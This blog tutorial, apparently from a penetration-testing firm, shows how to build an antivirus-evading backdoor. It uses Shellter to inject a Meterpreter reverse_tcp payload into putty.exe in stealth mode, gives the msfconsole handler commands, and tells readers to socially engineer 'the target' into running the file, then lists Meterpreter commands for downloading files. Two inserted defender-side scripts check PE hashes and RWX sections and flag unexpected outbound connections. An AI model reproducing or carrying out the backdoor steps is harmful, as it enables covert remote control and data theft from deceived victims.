There are many anti-virus programs on the market, and some are even free, such as Avira Anti Virus, AVG Free Antivirus or 360 Internet Security. A virus scanner is meant to find and remove malicious content from your system, or to prevent it from getting there in the first place. Malicious content can either harm a computer or act as a backdoor that lets an attacker exploit your system.
But what if someone is still able to get access to your system and exploit it even when you have one of these reputable anti-virus programs installed? Are we really safe with a virus scanner?
Using Kali and Shellter to penetrate a Windows system
With the popular Kali Linux framework called Metasploit, even a good virus scanner can be bypassed. Using Shellter, an interface under the Metasploit framework, you can inject shellcode into native Windows applications (currently 32-bit applications only). Kali can be run from a virtual machine image, in live mode by booting the ISO, or by installing it on your system.
Metasploit is not a single tool; it is a framework used for developing and executing exploit code against a remote target.
- A payload is a piece of code that runs remotely on the target system.
- An exploit is a chunk of data or a sequence of code that takes advantage of a bug or vulnerability.
- Auxiliary modules are used for scanning, fuzzing and various other tasks.
- An encoder is a program that encodes payloads to avoid anti-virus detection.
Metasploit has several different interfaces that make these tasks easier:
- MSFConsole: This is the main interface and can be opened from the terminal by executing "msfconsole".
- Armitage: A graphical version of Metasploit. In Armitage we can open more than one terminal and search for GUI or CUI exploits at the same time.
- Shellter: A dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. Shellter takes advantage of the original structure of the PE file and does not apply modifications such as changing memory access permissions of sections (unless the user wants it), adding an extra section with RWE access, or anything else that would look dodgy under an anti-virus scan.
Let's start hacking with Metasploit and Shellter
First we need to download and install Shellter and choose a PE target. A PE target is a 32-bit executable (.exe) file that we will send to the target machine. Log in to your Kali system and do the following:
- Download shellter.zip from www.shellterproject.com/download/
- Extract it to the desktop.
- Download the putty.exe file from www.putty.org
- Place this putty.exe file in the extracted Shellter folder.
- To run Shellter on Kali, open a terminal, change to the Shellter folder and execute: wine shellter.exe
- This opens Shellter in Wine and asks you for the PE target.
- Since you have put putty.exe in the Shellter directory, type putty.exe and press Enter.
- Type a to select automatic mode.
- Confirm yes to stealth mode.
- Type l to choose from the listed payloads. You can also supply your own payload.
- You will then be presented with a list of payloads. Press 1 to choose windows/meterpreter/reverse_tcp
- Set LHOST, the IP address of your Kali machine. To find it, open a new terminal, type ifconfig and press Enter.
- Set LPORT, the port on which Metasploit will listen for the target machine's connection.
The newly created putty.exe is the backdoor that needs to run on the target machine.
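As an added, defender-side example that is not part of the original post: the procedure above produces a putty.exe whose bytes no longer match the vendor's build. A practitioner who receives such a file wants two quick checks before running it: does its SHA-256 match a trusted allowlist, and does its PE section table contain a section that is both writable and executable, the kind of trait the post itself calls dodgy. The script below implements both; the PE images it tests against are constructed in build_sample_pe (minimal headers only, not runnable programs), and the trusted hash set is a placeholder for the vendor's published checksum. Note the caveat the post implies: an injector that is careful to avoid RWE sections will not trip the second check, so the hash comparison is the one that matters most.

```python
"""Defender-side PE sanity checks: trusted-hash allowlist plus a scan for
writable-and-executable sections. Added example, not code from the post."""
import hashlib
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data: bytes):
    """Return [(name, characteristics)] for every section header in a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # COFF file header follows "PE\0\0"
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size              # section table after optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                  # each section header is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, characteristics))
    return sections


def writable_executable_sections(data: bytes):
    """Names of sections carrying both MEM_WRITE and MEM_EXECUTE."""
    return [name for name, flags in parse_sections(data)
            if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def assess(data: bytes, trusted_hashes) -> list:
    """Return a list of human-readable findings; an empty list means no concern."""
    findings = []
    if sha256_hex(data) not in trusted_hashes:
        findings.append("hash not in trusted allowlist")
    for name in writable_executable_sections(data):
        findings.append(f"section {name} is writable and executable")
    return findings


def build_sample_pe(section_flags) -> bytes:
    """Construct a minimal PE32 image (headers only) with the given section flags."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after DOS stub
    opt = bytes(224)                          # PE32 optional header size; contents unused
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_flags), 0, 0, 0, len(opt), 0x0102)
    sections = b""
    for i, flags in enumerate(section_flags):
        name = f".s{i}".encode().ljust(8, b"\0")
        sections += name + struct.pack("<IIIIIIHHI", 0x1000, 0x1000 * (i + 1),
                                       0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
    return bytes(dos) + b"PE\0\0" + coff + opt + sections


# Constructed samples: a clean layout (.text R+X, .data R+W) and one with an
# added R+W+X section. Neither is a real binary.
CLEAN = build_sample_pe([0x60000020, 0xC0000040])
SUSPECT = build_sample_pe([0x60000020, 0xE0000020])

# Placeholder allowlist; in practice use the vendor's published SHA-256.
TRUSTED = {sha256_hex(CLEAN)}

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, assess(image, TRUSTED) or "no findings")
```

Running the script reports no findings for the clean image and two for the suspect one (unknown hash, plus the RWX section). Against a real download, replace TRUSTED with the checksum published by the software vendor and run assess on the file's bytes.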
Now open a new terminal and start msfconsole; the Metasploit interface will open.
- Execute use exploit/multi/handler. This is the name of the exploit module we will use. Metasploit has different types of exploits available for different kinds of attacks.
- Execute set payload windows/meterpreter/reverse_tcp. This sets the payload, which is the code that will run on the target machine.
- Set LHOST, the IP address of your Kali machine.
- Set LPORT, the same listening port you chose in Shellter.
Metasploit will now listen for your target's connection.
In order to gain access to the target machine, use your social engineering skills to make the target run putty.exe on the system. The reason why I chose putty.exe is that putty.exe is a program that lets Windows users establish a secure connection to Unix (and Linux) terminals, among other things. So the target will not suspect it of being a malicious file.
When putty.exe is running on the target system, run exploit from the terminal. If everything went according to plan, a Meterpreter session will open.
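As an added, defender-side example that is not part of the original post: the handler described above waits for the backdoored program to connect back to LHOST:LPORT, so on the victim's side the tell-tale sign is a familiar process opening an outbound connection to a port it has no business using. The script below runs that check over process network-connection events. The event lines are constructed and only loosely modelled on Sysmon Event ID 3; the per-process port baseline in EXPECTED_PORTS is an assumption for the example and would come from your own environment.

```python
"""Flag process network connections that fall outside a per-process port
baseline. Added example, not code from the post; log lines are constructed."""
import re

# Constructed sample events, one key=value line per outbound connection.
# IP addresses are from the documentation ranges (RFC 5737).
SAMPLE_EVENTS = [
    "ts=2024-01-01T10:00:01 image=C:\\Program Files\\PuTTY\\putty.exe dst=203.0.113.10 port=22",
    "ts=2024-01-01T10:00:09 image=C:\\Users\\bob\\Downloads\\putty.exe dst=192.0.2.25 port=4444",
    "ts=2024-01-01T10:00:15 image=C:\\Program Files\\Google\\Chrome\\chrome.exe dst=198.51.100.7 port=443",
    "ts=2024-01-01T10:00:20 image=C:\\Windows\\System32\\notepad.exe dst=192.0.2.25 port=8080",
]

# Assumed baseline: destination ports each process is expected to use.
EXPECTED_PORTS = {
    "putty.exe": {22, 23},
    "chrome.exe": {80, 443},
}

EVENT_RE = re.compile(
    r"ts=(?P<ts>\S+) image=(?P<image>.+?) dst=(?P<dst>\S+) port=(?P<port>\d+)$"
)


def parse_event(line: str) -> dict:
    """Parse one constructed event line into a dict with an int port and basename."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    ev = m.groupdict()
    ev["port"] = int(ev["port"])
    ev["basename"] = ev["image"].rsplit("\\", 1)[-1].lower()
    return ev


def find_unexpected_connections(lines, expected=EXPECTED_PORTS) -> list:
    """Return (process, dst, port, reason) for every connection outside the baseline."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        allowed = expected.get(ev["basename"])
        if allowed is None:
            findings.append((ev["basename"], ev["dst"], ev["port"],
                             "process has no network baseline"))
        elif ev["port"] not in allowed:
            findings.append((ev["basename"], ev["dst"], ev["port"],
                             "destination port outside baseline"))
    return findings


def destinations_shared_by_flagged(findings) -> dict:
    """Group flagged findings by destination: several processes calling the
    same unexpected host is worth a closer look than a single odd connection."""
    by_dst = {}
    for process, dst, port, _reason in findings:
        by_dst.setdefault(dst, set()).add((process, port))
    return by_dst


if __name__ == "__main__":
    flagged = find_unexpected_connections(SAMPLE_EVENTS)
    for process, dst, port, reason in flagged:
        print(f"{process} -> {dst}:{port}  ({reason})")
    for dst, callers in destinations_shared_by_flagged(flagged).items():
        if len(callers) > 1:
            print(f"destination {dst} contacted by {len(callers)} flagged processes")
```

On the sample data the script flags the copy of putty.exe in the Downloads folder connecting to port 4444 and notepad.exe connecting at all, and then notes that both flagged connections go to the same host. The baseline approach is deliberately independent of any particular port or tool: it catches a connect-back on whatever port the attacker chose, as long as that port is not one the process normally uses.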
What can you do with Meterpreter?
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers. In simple words, with meterpreter you can have command line access to the target's system.
Here are some Meterpreter commands:
- sysinfo gives you the target system's information.
- download downloads a file from the remote machine. Note the use of double backslashes when giving the Windows path. For example: download c:\\boot.ini
For the full list of commands, type help.
Have fun hacking, but please use your skills for testing purposes only!
Want us to test your security?
Want to know if your systems are safe? Check out our penetration testing service!